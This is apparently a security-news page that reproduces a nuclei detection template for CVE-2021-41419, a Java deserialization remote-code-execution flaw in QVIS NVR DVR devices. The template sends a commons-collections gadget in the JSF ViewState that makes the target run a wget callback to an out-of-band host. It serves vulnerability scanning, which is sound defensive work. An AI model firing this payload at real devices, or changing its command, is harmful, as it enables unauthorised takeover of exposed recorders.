Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-41419: nuclei-templates/qvisdvr-deserialization-rce.yaml at master · projectdiscovery/nuclei-templates

QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.

CVE
#js#java#rce#auth

id: qvisdvr-deserialization-rce

info:

name: QVISDVR JSF Deserialization - Remote Code Execution

author: me9187

severity: critical

description: |

QVISDVR Java-Deserialization was discovered, which could allow remote code execution.

reference:

- https://twitter.com/Me9187/status/1414606876575162373

classification:

cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

cvss-score: 10.0

cwe-id: CWE-77

tags: qvisdvr,rce,deserialization,jsf,iot

requests:

- raw:

- |

GET /qvisdvr/ HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

- |

POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", “base64”)}}

extractors:

- type: regex

name: token

group: 1

internal: true

part: header

regex:

- "JSESSIONID=(.*)"

matchers-condition: and

matchers:

- type: word

part: interactsh_protocol

words:

- http

- type: status

status:

- 500

Enhanced by mp on 2022/05/19

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907